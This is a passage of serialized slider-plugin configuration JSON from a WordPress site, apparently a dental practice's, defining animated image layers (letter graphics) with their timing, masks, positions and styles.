1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"zindex\":\"auto\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"serial\":2,\"endWithSlide\":false,\"p_uid\":-1,\"toggle\":false,\"toggle_use_hover\":false,\"toggle_inverse_content\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"displaymode\":true,\"attrID\":\"\",\"attrWrapperID\":\"\",\"attrClasses\":\"\",\"attrWrapperClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"layer-selectable\":\"default\",\"column_break_at\":\"mobile\",\"zIndex\":7,\"positionLeftReset\":60,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]},\"parallax_layer_ddd_zlevel\":\"front\"},{\"style\":\"\",\"text\":\"Image 4\",\"type\":\"image\",\"image_url\":\"http:\\/\\/www.ze-dent.com\\/wp-content\\/uploads\\/2018\\/07\\/d-y.png\",\"scaleProportional\":true,\"scaleX\":{\"desktop\":\"136\"},\"scaleY\":{\"desktop\":\"140px\"},\"originalWidth\":185,\"originalHeight\":191,\"special_type\":null,\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":750,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":600,\"animation\":\"SlideMaskFromRight\",\"easing\":\"Power3.easeInOut\",\"time_relative\":750,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4860,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"auto\",\"easing\":\"Power3.easeInOut\",\"time_relative\":3510,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"unique_id\":5,\"left\":{\"desktop\":101},\"top\":{\"desktop\":0},\"isDemo\":false,\"internal_class\":\"\",\"hover\":false,\"alias\":\"d\",\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"layer_blend_mode\":\"normal\",\"html_tag\":\"div\",\"mask_start\":true,\"mask_end\":true,\"force_hover\":true,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0px\",\"mask_y_start\":\"0px\",\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"alt\":\"\",\"max_height\":{\"desktop\":\"auto\"},\"min_height\":\"40px\",\"max_width\":{\"desktop\":\"auto\"},\"video_width\":{\"desktop\":\"480px\"},\"video_height\":{\"desktop\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\"},\"display\":\"block\",\"static_start\":\"1\",\"static_end\":\"last\",\"align_hor\":{\"desktop\":\"center\"},\"align_vert\":{\"desktop\":\"middle\"},\"hiddenunder\":false,\"resizeme\":true,\"seo-optimized\":false,\"link\":\"\",\"link_open_in\":\"same\",\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"css-position\":\"relative\",\"width\":136,\"height\":140,\"cover_mode\":\"custom\",\"static_styles\":{\"font-size\":{\"desktop\":\"20\"},\"line-height\":{\"desktop\":\"22\"},\"font-weight\":{\"desktop\":\"400\"},\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\"},\"letter-spacing\":{\"desktop\":\"\"}},\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"inherit\"},\"x_start\":\"[100%]\",\"y_start\":\"inherit\",\"z_start\":\"0\",\"x_end\":\"inherit\",\"y_end\":\"inherit\",\"z_end\":\"inherit\",\"opacity_start\":\"inherit\",\"opacity_end\":\"0\",\"x_rotate_start\":\"0deg\",\"y_rotate_start\":\"0\",\"z_rotate_start\":\"0\",\"x_rotate_end\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"1\",\"scale_y_start\":\"1\",\"scale_x_end\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"0\",\"skew_y_start\":\"0\",\"skew_x_end\":\"inherit\",\"skew_y_end\":\"inherit\",\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"deformation\":{\"font-family\":\"Open Sans\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-transform\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"overflow\":\"visible\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"parallax\":\"4\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"deformation-hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"zindex\":\"auto\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"serial\":3,\"endWithSlide\":false,\"p_uid\":-1,\"toggle\":false,\"toggle_use_hover\":false,\"toggle_inverse_content\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"displaymode\":true,\"attrID\":\"\",\"attrWrapperID\":\"\",\"attrClasses\":\"\",\"attrWrapperClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"layer-selectable\":\"default\",\"column_break_at\":\"mobile\",\"zIndex\":8,\"positionLeftReset\":75,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]},\"parallax_layer_ddd_zlevel\":\"front\"},{\"style\":\"\",\"text\":\"Image 8\",\"type\":\"image\",\"image_url\":\"http:\\/\\/www.ze-dent.com\\/wp-content\\/uploads\\/2018\\/07\\/e-m-y.png\",\"scaleProportional\":true,\"scaleX\":{\"desktop\":\"136px\"},\"scaleY\":{\"desktop\":\"140px\"},\"originalWidth\":185,\"originalHeight\":191,\"special_type\":null,\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":900,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":600,\"animation\":\"SlideMaskFromLeft\",\"easing\":\"Power3.easeInOut\",\"time_relative\":900,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4860,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"auto\",\"easing\":\"Power3.easeInOut\",\"time_relative\":3360,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"unique_id\":9,\"left\":{\"desktop\":204},\"top\":{\"desktop\":0},\"isDemo\":false,\"internal_class\":\"\",\"hover\":false,\"alias\":\"e\",\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"layer_blend_mode\":\"normal\",\"html_tag\":\"div\",\"mask_start\":true,\"mask_end\":true,\"force_hover\":true,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0px\",\"mask_y_start\":\"0px\",\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"alt\":\"\",\"max_height\":{\"desktop\":\"auto\"},\"min_height\":\"40px\",\"max_width\":{\"desktop\":\"auto\"},\"video_width\":{\"desktop\":\"480px\"},\"video_height\":{\"desktop\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\"},\"display\":\"block\",\"static_start\":\"1\",\"static_end\":\"last\",\"align_hor\":{\"desktop\":\"center\"},\"align_vert\":{\"desktop\":\"middle\"},\"hiddenunder\":false,\"resizeme\":true,\"seo-optimized\":false,\"link\":\"\",\"link_open_in\":\"same\",\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"css-position\":\"relative\",\"width\":136,\"height\":140,\"cover_mode\":\"custom\",\"static_styles\":{\"font-size\":{\"desktop\":\"20\"},\"line-height\":{\"desktop\":\"22\"},\"font-weight\":{\"desktop\":\"400\"},\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\"},\"letter-spacing\":{\"desktop\":\"\"}},\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"inherit\"},\"x_start\":\"[-100%]\",\"y_start\":\"inherit\",\"z_start\":\"0\",\"x_end\":\"inherit\",\"y_end\":\"inherit\",\"z_end\":\"inherit\",\"opacity_start\":\"inherit\",\"opacity_end\":\"0\",\"x_rotate_start\":\"0deg\",\"y_rotate_start\":\"0\",\"z_rotate_start\":\"0\",\"x_rotate_end\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"1\",\"scale_y_start\":\"1\",\"scale_x_end\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"0\",\"skew_y_start\":\"0\",\"skew_x_end\":\"inherit\",\"skew_y_end\":\"inherit\",\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"deformation\":{\"font-family\":\"Open Sans\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-transform\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"overflow\":\"visible\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"parallax\":\"8\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"deformation-hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"zindex\":\"auto\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"serial\":4,\"endWithSlide\":false,\"p_uid\":-1,\"toggle\":false,\"toggle_use_hover\":false,\"toggle_inverse_content\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"displaymode\":true,\"attrID\":\"\",\"attrWrapperID\":\"\",\"attrClasses\":\"\",\"attrWrapperClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"layer-selectable\":\"default\",\"column_break_at\":\"mobile\",\"zIndex\":9,\"positionLeftReset\":90,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]},\"parallax_layer_ddd_zlevel\":\"front\"},{\"style\":\"\",\"text\":\"Image 6\",\"type\":\"image\",\"image_url\":\"http:\\/\\/www.ze-dent.com\\/wp-content\\/uploads\\/2018\\/07\\/n-y.png\",\"scaleProportional\":true,\"scaleX\":{\"desktop\":\"139px\"},\"scaleY\":{\"desktop\":\"140px\"},\"originalWidth\":185,\"originalHeight\":191,\"special_type\":null,\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":1050,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":600,\"animation\":\"SlideMaskFromRight\",\"easing\":\"Power3.easeInOut\",\"time_relative\":1050,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4860,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"auto\",\"easing\":\"Power3.easeInOut\",\"time_relative\":3210,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"unique_id\":7,\"left\":{\"desktop\":311},\"top\":{\"desktop\":0},\"isDemo\":false,\"internal_class\":\"\",\"hover\":false,\"alias\":\"n\",\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"layer_blend_mode\":\"normal\",\"html_tag\":\"div\",\"mask_start\":true,\"mask_end\":true,\"force_hover\":true,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0px\",\"mask_y_start\":\"0px\",\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"alt\":\"\",\"max_height\":{\"desktop\":\"auto\"},\"min_height\":\"40px\",\"max_width\":{\"desktop\":\"auto\"},\"video_width\":{\"desktop\":\"480px\"},\"video_height\":{\"desktop\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\"},\"display\":\"block\",\"static_start\":\"1\",\"static_end\":\"last\",\"align_hor\":{\"desktop\":\"center\"},\"align_vert\":{\"desktop\":\"middle\"},\"hiddenunder\":false,\"resizeme\":true,\"seo-optimized\":false,\"link\":\"\",\"link_open_in\":\"same\",\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"css-position\":\"relative\",\"width\":139,\"height\":140,\"cover_mode\":\"custom\",\"static_styles\":{\"font-size\":{\"desktop\":\"20\"},\"line-height\":{\"desktop\":\"22\"},\"font-weight\":{\"desktop\":\"400\"},\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\"},\"letter-spacing\":{\"desktop\":\"\"}},\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"inherit\"},\"x_start\":\"[100%]\",\"y_start\":\"inherit\",\"z_start\":\"0\",\"x_end\":\"inherit\",\"y_end\":\"inherit\",\"z_end\":\"inherit\",\"opacity_start\":\"inherit\",\"opacity_end\":\"0\",\"x_rotate_start\":\"0deg\",\"y_rotate_start\":\"0\",\"z_rotate_start\":\"0\",\"x_rotate_end\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"1\",\"scale_y_start\":\"1\",\"scale_x_end\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"0\",\"skew_y_start\":\"0\",\"skew_x_end\":\"inherit\",\"skew_y_end\":\"inherit\",\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"deformation\":{\"font-family\":\"Open Sans\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-transform\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"overflow\":\"visible\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"parallax\":\"10\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"deformation-hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"zindex\":\"auto\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"serial\":5,\"endWithSlide\":false,\"p_uid\":-1,\"toggle\":false,\"toggle_use_hover\":false,\"toggle_inverse_content\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"displaymode\":true,\"attrID\":\"\",\"attrWrapperID\":\"\",\"attrClasses\":\"\",\"attrWrapperClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"layer-selectable\":\"default\",\"column_break_at\":\"mobile\",\"zIndex\":10,\"positionLeftReset\":105,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]},\"parallax_layer_ddd_zlevel\":\"front\"},{\"style\":\"\",\"text\":\"Image 7\",\"type\":\"image\",\"image_url\":\"http:\\/\\/www.ze-dent.com\\/wp-content\\/uploads\\/2018\\/07\\/t-y.png\",\"scaleProportional\":true,\"scaleX\":{\"desktop\":\"146px\"},\"scaleY\":{\"desktop\":\"140px\"},\"originalWidth\":185,\"originalHeight\":191,\"special_type\":null,\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":1200,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":600,\"animation\":\"SlideMaskFromLeft\",\"easing\":\"Power3.easeInOut\",\"time_relative\":1200,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4860,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"auto\",\"easing\":\"Power3.easeInOut\",\"time_relative\":3060,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"unique_id\":8,\"left\":{\"desktop\":438},\"top\":{\"desktop\":0},\"isDemo\":false,\"internal_class\":\"\",\"hover\":false,\"alias\":\"t\",\"layer_bg_position\":\"center 